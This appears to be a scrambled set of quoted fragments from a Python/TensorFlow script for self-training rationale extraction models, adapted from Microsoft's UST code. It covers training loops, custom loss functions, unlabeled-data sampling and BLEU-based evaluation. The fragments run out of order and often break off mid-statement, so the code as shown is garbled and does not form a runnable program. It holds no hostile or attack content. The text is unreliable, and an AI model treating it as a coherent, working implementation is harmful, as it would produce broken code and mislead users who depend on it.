y_test[:,1:], y_test[:,0], np.ones(len(y_test))], verbose=0)[-3] if '_neg' in type_: y_neg_dev", "elif 'joint' in type_: X_unlabeled_sample, y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices],", "y[train_size:] else: X_train, y_train = {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size]}, y[:train_size] X_dev,", "tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'l2_distance': custom_loss}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'l2_distance':None}) #model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08),", "best_validation_loss = np.inf for counter in range(N_base): #original N_base=10 with strategy.scope(): if 'mtl'", "0.01*coh_loss def custom_loss_neg(y_true, y_pred): cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE) return tf.reduce_sum(cce(y_true, y_pred))*(1/(unsup_batch_size*gpus)) model =", "(micro/task): {}\".format(precision_recall_fscore_support(class_acc, y_test[:,0], average='micro'))) logger.info(\"Token Predictions shape {}\".format(test_pred.shape)) pred, truth = [], []", "y_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]}, y_batch[indices] if 'joint' in type_:", "i in range(len(X_test[\"input_ids\"])): text = tokenizer.decode(X_test[\"input_ids\"][i]) temp = dict() temp['text'] = text temp['truth']", "loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': rat_loss, 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'not_rationale_task_classifier': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier':None}, loss_weights=loss_weights)", "[0.5, 0.5] with strategy.scope(): model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss=[tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), rat_loss], metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"dense_3_classification_acc\")])#, tf.keras.metrics.SparseCategoricalAccuracy(name=\"token_acc\")]) #, sample_weight_mode=\"temporal\") model.fit(x=X_train,", "len(X_unlabeled[\"input_ids\"]): logger.info (\"Evaluating confidence on {} number of instances sampled from {} unlabeled", "y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-3] val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[0] if task_acc", "<gh_stars>0 \"\"\" Author: <NAME> (<EMAIL>) Code for Self-training for Rationale using few-shot learning.", "loss_weights = [1.0, 1.0, 1.0, 1.0] if '_noexp' in type_: loss_weights = [1.0,", "\"attention_mask\": X_unlabeled_sample['attention_mask'][indices]}, y_batch[indices] if 'joint' in type_: X_rationale_batch = {\"input_ids_r\": X_sample['input_ids'][indices], \"token_type_ids_r\": X_sample['token_type_ids'][indices],", "= 0. max_task_acc = 0. max_best_acc = 0. val_loss = 0. if 'mtl'", "test_pred[i].sum() pred_0+= max_seq_length-pred_1 truth_1 += y_test[i].sum() truth_0+= max_seq_length-truth_1 pred.append(' '.join(temp_p)) truth.append(' '.join(temp_t)) for", "= tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) loss_weights = None if '_noexp' in type_: loss_weights = [1.0, 0.0]", "warmup_epoch_count=10, total_epoch_count=90): def lr_scheduler(epoch): if epoch < warmup_epoch_count: res = (max_learn_rate/warmup_epoch_count) * (epoch", "X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices], 'input_ids_r':X_unlabeled['input_ids_r'][indices], 'token_type_ids_r':X_unlabeled['token_type_ids_r'][indices], 'attention_mask_r':X_unlabeled['attention_mask_r'][indices]}, y_pred[indices] else: X_unlabeled_sample, y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices],", "if 'fine_tune_teacher' in type_: rat_loss = None if 'focal' in type_: rat_loss =", "temp['score'] = nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split()) data.append(temp) with open(os.path.join(model_dir, 'rationale_output_test_teacher_'+type_+'.json'), 'w') as f: json.dump(data, f) model_student", "val_loss[0] < best_validation_loss: best_base_model = model best_validation_loss = val_loss[0] model = best_base_model '''", "type_: acc, y_pred = model.predict(X_unlabeled_sample, batch_size=256) y_val = np.amax(tf.math.softmax(acc, axis=-1).numpy(), axis=-1) y_rat =", "np.argmax(r_acc, axis=-1) logger.info(\"Best task acc score: {}\".format(precision_recall_fscore_support(acc, y_test[:,0], average='micro'))) logger.info(\"Best token acc score:", "float(res) learning_rate_scheduler = tf.keras.callbacks.LearningRateScheduler(lr_scheduler, verbose=1) return learning_rate_scheduler def train_model(max_seq_length, X, y, X_test, y_test,", "X[\"attention_mask\"][train_size:], \"input_ids_r\":X[\"input_ids_r\"][train_size:], \"token_type_ids_r\":X[\"token_type_ids_r\"][train_size:], \"attention_mask_r\":X[\"attention_mask_r\"][train_size:], \"input_ids_neg\":X[\"input_ids_neg\"][train_size:], \"token_type_ids_neg\":X[\"token_type_ids_neg\"][train_size:], \"attention_mask_neg\":X[\"attention_mask_neg\"][train_size:]}, y[train_size:] elif 'joint' in type_: X_train,", "in type_: X_rationale_batch = {\"input_ids_r\": X_sample['input_ids'][indices], \"token_type_ids_r\": X_sample['token_type_ids'][indices], \"attention_mask_r\": X_sample['attention_mask'][indices]} if '_neg' in", "rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) loss_weights = [1.0, 1.0, 1.0, 1.0]", "logger.info (\"Best validation acc for base model {}: {}\".format(best_validation_loss, model.evaluate(X_dev, [y_dev[:,0],y_dev[:,1:]]))) ''' if", "len(labels), y_T=y_T, type_=type_) probs = y_val[indices] probs_rat = y_rat[indices] cls = list(acc[indices]) logger.info(cls)", "= (max_learn_rate/warmup_epoch_count) * (epoch + 1) else: res = max_learn_rate*math.exp(math.log(end_learn_rate/max_learn_rate)*(epoch-warmup_epoch_count+1)/(total_epoch_count-warmup_epoch_count+1)) return float(res) learning_rate_scheduler", "type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) def custom_loss(y_true, y_pred): cce =", "y_batch = np.concatenate((acc[indices], y_pred[indices]), axis=1) X_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]}", "elif 'joint' in type_: acc = acc[:,None] y_batch = np.concatenate((acc[indices], y_pred[indices][:, 1:]), axis=1)", "y_dev[:,0], np.full((len(y_dev),len(labels)), 1/len(labels))] y_test_plg = [y_test[:,1:], y_test[:,0], np.full((len(y_test),len(labels)), 1/len(labels))] test_acc = model.evaluate(X_dev, [y_dev[:,0],", "axis=0)) #l2_loss = 0.0 #logger.info(l1_loss) return cce_loss + 0.1*l1_loss + 0.01*coh_loss def custom_loss_neg(y_true,", "type_ == 'joint': logger.info(type_) def custom_loss(y_true, y_pred): logger.info(y_pred) return kb.mean(y_true*y_pred, axis=-1) with strategy.scope():", "(task) for joint {}\".format(temp)) logger.info (\"Val acc (token) {}\".format(test_acc)) logger.info (\"Val acc (task)", "custom_loss(y_true, y_pred): cce = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=tf.keras.losses.Reduction.NONE) if 'focal' in type_: cce = SparseCategoricalFocalLoss(gamma=2,", "if '_noexp' in type_: loss_weights = [1.0, 0.0, 0.0, 0.0] elif '_no_suffcomp' in", "range(len(test_pred)): temp_p, temp_t, ct = [],[], 0 temp = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i])[1:] #logger.info(\"Test sample {}\".format(temp))", "average='macro'))) logger.info(\"Teacher model best score (micro/task): {}\".format(precision_recall_fscore_support(class_acc, y_test[:,0], average='micro'))) logger.info(\"Token Predictions shape {}\".format(test_pred.shape))", "loaded from {}\".format(model_file)) break elif 'mtl' in type_ : logger.info(y_train.shape) model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:]],", "np.ones(len(y_dev))], verbose=0)[0] if task_acc > max_task_acc: logger.info (\"Val acc (task) {}\".format(task_acc)) max_task_acc =", "y_pred): cce = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=tf.keras.losses.Reduction.NONE) tf.print(tf.size(y_true), tf.size(y_pred)) cce_loss = ((cce(y_true, y_pred))* 1/(unsup_batch_size*gpus)) l1_loss", "#fix hardcoding labels = set(y[:,0]) logger.info (\"Class labels {}\".format(labels)) #split X and y", "(\"Sampling uniformly\") if unsup_size < len(X_unlabeled_sample['input_ids']): '''X_unlabeled_sample, y_pred = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices],", "callbacks=[tf.keras.callbacks.EarlyStopping(monitor='loss', patience=5, restore_best_weights=True)]) # class_weight=class_weight) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]) logger.info", "= None if 'focal' in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True)", "\"input_ids_r\":X[\"input_ids_r\"][:train_size], \"token_type_ids_r\":X[\"token_type_ids_r\"][:train_size], \"attention_mask_r\":X[\"attention_mask_r\"][:train_size]}, y[:train_size] X_dev, y_dev = {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:],", "tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred),axis=0)) coh_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred[1:]-y_pred[:-1]), axis=0)) #l2_loss = 0.0 #logger.info(l1_loss) return cce_loss + 0.01*l1_loss", "using few-shot learning. This code base is adapted from UST (https://github.com/microsoft/UST) \"\"\" from", "1/len(labels)) y_neg_test = np.full((len(y_test), len(labels)), 1/len(labels)) y_dev_plg = [y_dev[:,1:], y_dev[:,0], np.full((len(y_dev),len(labels)), 1/len(labels))] y_test_plg", "for counter in range(N_base): #original N_base=10 with strategy.scope(): if 'mtl' in type_: rat_loss", "X_batch['token_type_ids_neg'], X_batch['attention_mask_neg'] = X_neg_rationale_batch['input_ids_neg'], X_neg_rationale_batch['token_type_ids_neg'], X_neg_rationale_batch['attention_mask_neg'] model.fit(x=X_batch, y=[y_batch[:,0], y_batch[:,1:], y_batch[:, 0], np.full((len(y_batch),len(labels)), 1/len(labels))],", "val_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-3] ''' if val_loss < best_loss:", "logger.info (\"Test token acc for run {} : {}\".format(counter, test_acc)) logger.info (\"Best Test", "set (teacher model): {} \".format(score4/len(pred))) best_loss = np.inf data = [] for i", "in type_: logger.info(\"y_test: {}\".format(y_test)) test_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[4] task_acc = model.evaluate(X_test,", "Test task acc for run {} with total loss : {}\".format(counter, task_acc)) if", "as np import os, sys import json import nltk import tensorflow as tf", "test set (teacher model): {} \".format(score4/len(pred))) best_loss = np.inf data = [] for", "= model.predict(X_unlabeled_sample, batch_size=64) acc, y_pred, r_acc = out[0], out[1], out[2] y_val = np.amax(tf.math.softmax(acc,", "np.where(y_batch[:,0]==i)[0] GLOBAL_SEED = int(os.getenv(\"PYTHONHASHSEED\")) random.Random(GLOBAL_SEED).shuffle(indx) if len(indx) > unsup_size: indx = indx[:unsup_size] logger.info(\"Shape", "0, 0)) score2 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 1, 0, 0)) score3 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0,", "(\"Test acc (task) {}\".format(test_task_acc)) if test_task_acc >= max_best_acc: max_best_acc = test_task_acc model_file =", "{} with total loss : {}\".format(counter, task_acc)) if 'mtl' in type_: class_acc =", "acc, y_pred, r_acc = out[0], out[1], out[2] y_val = np.amax(tf.math.softmax(acc, axis=-1).numpy(), axis=-1) y_rat", "probs = y_val[indices] X_conf = np.ones((len(y_batch), max_seq_length)) X_conf[:,0] = np.log(probs+1e-10)*alpha ''' else: logger.info(\"No", "axis=-1) logger.info(\"Printing prediction data on student model for run {}: {}\".format(counter, test_pred)) tp,", "logger.info (\"Model file loaded from {}\".format(model_file)) break elif 'mtl' in type_ : logger.info(y_train.shape)", "'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier': None}, loss_weights=loss_weights) if counter == 0: logger.info(model.summary()) model_file = os.path.join(model_dir, \"model_label.h5\")", "[1.0, 1.0, 1.0, 1.0] ''' if '_noexp' in type_: loss_weights = [1.0, 0,", "#_student = deepcopy(model) ''' if test_acc > max_test_acc: max_test_acc = test_acc test_task_acc =", "\"model_label.h5\") model_file_task = os.path.join(model_dir, \"model_task.h5\") model_file_best = os.path.join(model_dir, \"model_best.h5\") if os.path.exists(model_file): model.load_weights(model_file) #model_task.load_weights(model_file_task)", "temp_t, ct = [],[], 0 temp = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i])[1:] #logger.info(\"Test sample {}\".format(temp)) for j", "0, 0, 0] elif '_no_suffcomp' in type_: loss_weights = [1.0, 1.0, 0, 0]", "epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=5, restore_best_weights=True)], sample_weight=[X_conf[:,0],", "= pred[i] temp['score'] = nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split()) data.append(temp) with open(os.path.join(model_dir, 'rationale_output_test_teacher_'+type_+'.json'), 'w') as f: json.dump(data,", "N_base=10 with strategy.scope(): if 'mtl' in type_: rat_loss = None if 'focal' in", "y_mean, y_var, y_T = None, None, None if 'mtl' in type_: acc, y_pred", "''' probs = y_val[indices] X_conf = np.ones((len(y_batch), max_seq_length)) X_conf[:,0] = np.log(probs+1e-10)*alpha ''' else:", "None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'l2_distance': None}) elif 'joint_neg' in type_: rat_loss = None", "np.ones((len(X_batch['input_ids']), max_seq_length)) for i in range(len(cls)): X_conf[i,0] = class_weight[cls[i][0]]*X_conf[i,0] #logger.info (\"Weights {}\".format(X_conf[:10])) logger.info(\"X_connf", "np.concatenate((acc[indices], y_pred), axis=1) acc = acc[:,None] y_batch = np.concatenate((acc, y_pred), axis=1) logging.info(\"y_batch shape", "y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) # class_weight=class_weight) tf.keras.backend.clear_session() if not", "len(labels)), 1/len(labels))]) task_acc, test_acc, r_acc = out[3], out[4], out[5] elif 'joint' in type_:", "{}\".format(precision_recall_fscore_support(y_pred1, y_test[:,1:], average='macro'))) logger.info(\"Model performance for task (macro/task): {}\".format(precision_recall_fscore_support(acc1, y_test[:,0], average='macro'))) val_loss =", "best score (micro/task): {}\".format(precision_recall_fscore_support(class_acc, y_test[:,0], average='micro'))) logger.info(\"Token Predictions shape {}\".format(test_pred.shape)) pred, truth =", "if '_neg' in type_: X_unlabeled_sample, y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices],", "tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'l2_distance': custom_loss}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'l2_distance':None}) #model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),", "X_conf[:,0] = tf.nn.softmax(X_conf[:,0], axis=0) if '_r_' in type_: #re-weight rationales X_conf[:,1:] = np.where(log_rationale>0,", "\"attention_mask\": attention_mask_r} #mask tokens that are not rationales u-r if '_neg' in type_:", "shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=sup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='loss', patience=5, restore_best_weights=True)]) # class_weight=class_weight) val_loss =", "from focal_loss import BinaryFocalLoss, SparseCategoricalFocalLoss import random from sklearn.metrics import f1_score from sklearn.metrics", "= model_student.predict(X_test) acc, y_pred, r_acc = out[0], out[1], out[2] logger.info(\"Raw logits: {}\".format(acc)) y_pred", "model best score (micro/task): {}\".format(precision_recall_fscore_support(class_acc, y_test[:,0], average='micro'))) logger.info(\"Token Predictions shape {}\".format(test_pred.shape)) pred, truth", "max_seq_length-truth_1 pred.append(' '.join(temp_p)) truth.append(' '.join(temp_t)) for word in temp_p: if word in temp_t:", "{}\".format(temp)) logger.info (\"Val acc (token) {}\".format(test_acc)) logger.info (\"Val acc (task) {}\".format(task_acc)) logger.info (\"Test", "deepcopy(model) val_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-3] ''' if val_loss <", "in type_: out = model.predict(X_test) class_acc, test_pred, r_acc = out[0], out[1], out[2] class_acc", "task_acc, test_acc, r_acc = out[3], out[4], out[5] elif 'joint' in type_: out =", "y=[y_batch[:,0], y_batch[:,1:]], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='dense_3_classification_acc', patience=5, restore_best_weights=True)], sample_weight=[X_conf[:,0], X_conf[:,1:]])", "X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]}, y_batch[indices] if 'joint' in type_: X_rationale_batch = {\"input_ids_r\":", "'focal' in type_: cce = SparseCategoricalFocalLoss(gamma=2, reduction=tf.keras.losses.Reduction.NONE) cce_loss = ((cce(y_true, y_pred))* 1/(unsup_batch_size*gpus)) l1_loss", "'l2_distance': None}) elif 'joint_neg' in type_: rat_loss = None if 'focal' in type_:", "X_dev, y_dev = {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:], \"input_ids_r\":X[\"input_ids_r\"][train_size:], \"token_type_ids_r\":X[\"token_type_ids_r\"][train_size:], \"attention_mask_r\":X[\"attention_mask_r\"][train_size:], \"input_ids_neg\":X[\"input_ids_neg\"][train_size:],", "#split X and y to train and dev with valid_split if valid_split >", "model_student.load_weights(model_file_best) if 'mtl' in type_: acc, y_pred = model_student.predict(X_test) y_pred = np.argmax(y_pred, axis=-1)", "if '_neg' in type_: X_negation_sample = {\"input_ids\": np.array(X_unlabeled_sample[\"input_ids\"]), \"token_type_ids\": np.array(X_unlabeled_sample['token_type_ids']), \"attention_mask\": negation_mask} for", "{\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size]}, y[:train_size] X_dev, y_dev = {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\":", "tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i])[1:] for j in range(0,len(test_pred[0])-1): if test_pred[i][j] == 1: temp_p.append(temp[j]) if y_test[i][j+1] ==", "for Rationale using few-shot learning. This code base is adapted from UST (https://github.com/microsoft/UST)", "weights=(1, 0, 0, 0)) score2 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 1, 0, 0)) score3 +=", "range(0,len(test_pred[0])-1): if test_pred[i][j] == 1: temp_p.append(temp[j]) if y_test[i][j+1] == 1: #to skip evaluation", "of instances\".format(len(X_unlabeled[\"input_ids\"]))) X_unlabeled_sample = X_unlabeled #X_unlabeled_sample = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices]}", "{}\".format(y_batch.shape)) indices = [] for i in labels: indx = np.where(y_batch[:,0]==i)[0] GLOBAL_SEED =", "test_pred, r_acc = out[0], out[1], out[2] class_acc = np.argmax(class_acc, axis=-1) logger.info(\"Class predictions shape", "weights=(0, 0, 0, 1)) logger.info(\"BLEU-1 score of rationales on test set (teacher model):", "acc[:,None] y_batch = np.concatenate((acc, y_pred), axis=1) logging.info(\"y_batch shape {}\".format(y_batch.shape)) indices = [] for", "if 'norm' in type_: X_conf[:,1:] = tf.nn.softmax(X_conf[:,1:], axis=0) #X_conf = np.ones((len(X_batch['input_ids']), max_seq_length)) for", "#sys.exit(1) test_pred = y_pred #np.argmax(y_pred, axis=-1) logger.info(\"Printing prediction data on student model for", "0, 0] if '_no_suffcomp' in type_: loss_weights = [1.0, 1.0, 0, 0] '''", "model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-1] task_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-2] val_loss = model.evaluate(X_dev,", "type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) model = models.construct_teacher_joint(TFModel, Config, pt_teacher_checkpoint,", "[y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-3] val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[0]", "X_batch['attention_mask_neg'] = X_neg_rationale_batch['input_ids_neg'], X_neg_rationale_batch['token_type_ids_neg'], X_neg_rationale_batch['attention_mask_neg'] model.fit(x=X_batch, y=[y_batch[:,0], y_batch[:,1:], y_batch[:, 0], np.full((len(y_batch),len(labels)), 1/len(labels))], shuffle=True,", "in range(0,len(test_pred[0])-1): if test_pred[i][j] == 1: temp_p.append(temp[j]) if y_test[i][j+1] == 1: temp_t.append(temp[j]) pred_1", "1:]), axis=1) logger.info(\"y_batch shape: {}\".format(y_batch.shape)) #X_batch, y_batch, X_conf = f_(tokenizer, X_unlabeled_sample, y_mean, y_var,", "''' model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': custom_loss, 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'not_rationale_task_classifier': custom_loss_neg}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")],", "y_test[:,0], average='macro'))) logger.info(\"Teacher model best score (micro/task): {}\".format(precision_recall_fscore_support(class_acc, y_test[:,0], average='micro'))) logger.info(\"Token Predictions shape", "{}\".format(precision_recall_fscore_support(acc, y_test[:,0], average='micro'))) logger.info(\"Best token acc score: {}\".format(precision_recall_fscore_support(y_pred, y_test[:,1:], average='macro'))) pred, truth =", "#np.argmax(y_pred, axis=-1) logger.info(\"Printing prediction data on student model for run {}: {}\".format(counter, test_pred))", "out[0], out[1], out[2] class_acc = np.argmax(class_acc, axis=-1) logger.info(\"Class predictions shape {}\".format(class_acc.shape)) logger.info(\"Teacher model", "#.flatten() acc = np.argmax(acc, axis=-1) r_acc = np.argmax(r_acc, axis=-1) #y_rat = y_rat[:, 1:]", "loop {}\".format(epoch)) if type_ == 'mtl': test_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-1] task_acc", "= np.full((len(y_dev), len(labels)), 1/len(labels)) y_neg_test = np.full((len(y_test), len(labels)), 1/len(labels)) y_dev_plg = [y_dev[:,1:], y_dev[:,0],", "#re-weight labels X_conf[:,0] = np.where(log_probs>0, log_probs, 0.00000001) if 'norm' in type_: X_conf[:,0] =", "epoch < warmup_epoch_count: res = (max_learn_rate/warmup_epoch_count) * (epoch + 1) else: res =", "out[1], out[2] y_val = np.amax(tf.math.softmax(acc, axis=-1).numpy(), axis=-1) y_rat = np.amax(tf.math.softmax(y_pred, axis=-1).numpy(), axis=-1) y_pred", "X_conf[i,0] = class_weight[cls[i][0]]*X_conf[i,0] #logger.info (\"Weights {}\".format(X_conf[:10])) logger.info(\"X_connf shape: {}\".format(X_conf.shape)) if 'mtl' in type_:", "= [1.0, 0, 0, 0] if '_no_suffcomp' in type_: loss_weights = [1.0, 1.0,", "np.full((len(y_dev), len(labels)), 1/len(labels)) y_neg_test = np.full((len(y_test), len(labels)), 1/len(labels)) y_dev_plg = [y_dev[:,1:], y_dev[:,0], np.full((len(y_dev),len(labels)),", "Shape: {} {}\".format(X_dev[\"input_ids\"].shape, y_dev.shape)) logger.info(\"X Test Shape: {} {}\".format(X_test[\"input_ids\"].shape, y_test.shape)) logger.info (\"X Unlabeled", "verbose=0)[-3] val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[0] if task_acc > max_task_acc:", "len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss=[tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), rat_loss], metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"dense_3_classification_acc\")])#, tf.keras.metrics.SparseCategoricalAccuracy(name=\"token_acc\")]) #, sample_weight_mode=\"temporal\") elif", "sup_epochs=70, unsup_epochs=25, N_base=10, dense_dropout=0.5, attention_probs_dropout_prob=0.3, hidden_dropout_prob=0.3, test_data=None, unlabeled_data=None, class_weight=None, type_=\"token\", X_dev=None, y_dev=None, task=None):", "{} \".format(score4/len(pred))) best_loss = np.inf data = [] for i in range(len(X_test[\"input_ids\"])): text", "{\"input_ids_neg\": X_negation_sample['input_ids'][indices], \"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} else: indices = np.array([i for i in", "reduction=tf.keras.losses.Reduction.NONE) cce_loss = ((cce(y_true, y_pred))* 1/(unsup_batch_size*gpus)) l1_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred),axis=0)) coh_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred[1:]-y_pred[:-1]), axis=0))", "in type_: X_unlabeled_sample, y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices], 'input_ids_r':X_unlabeled['input_ids_r'][indices], 'token_type_ids_r':X_unlabeled['token_type_ids_r'][indices],", "'attention_mask': X_unlabeled[\"attention_mask\"][indices]} #logger.info (X_unlabeled_sample[\"input_ids\"][:5]) if 'joint' in type_: ids = [] attention_mask_r =", "#, sample_weight_mode=\"temporal\") elif type_ == 'joint': rat_loss = None if 'focal' in type_:", "= model_student logger.info(y_batch.shape) model.fit(x=X_batch, y=[y_batch[:,0], y_batch[:,1:]], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='dense_3_classification_acc',", "X_neg_rationale_batch['token_type_ids_neg'], X_neg_rationale_batch['attention_mask_neg'] model.fit(x=X_batch, y=[y_batch[:,0], y_batch[:,1:], y_batch[:, 0], np.full((len(y_batch),len(labels)), 1/len(labels))], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0],", "saved to {}\".format(model_file)) model_student = model model_student.load_weights(model_file_best) if 